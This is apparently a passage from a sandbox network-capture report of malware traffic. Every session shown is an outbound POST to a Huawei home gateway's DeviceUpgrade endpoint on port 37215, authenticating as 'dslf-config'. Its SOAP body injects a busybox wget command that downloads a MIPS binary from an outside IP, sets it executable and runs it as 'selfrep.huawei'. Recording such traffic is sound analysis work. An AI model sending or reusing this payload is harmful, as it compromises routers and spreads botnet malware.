                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          100192.168.2.2352578197.247.122.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125627041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          101192.168.2.235634641.252.239.7837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125674963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          102192.168.2.234642699.118.121.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125684023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          103192.168.2.2357624156.102.160.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125689983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          104192.168.2.2358072157.39.27.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125715017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          105192.168.2.2348304197.184.154.23637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125722885 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          106192.168.2.2349698150.221.57.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125778913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          107192.168.2.2350216101.158.98.2037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125781059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          108192.168.2.2359170157.79.31.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125792027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          109192.168.2.2336818161.209.166.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125842094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          110192.168.2.2360202157.247.83.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.125842094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
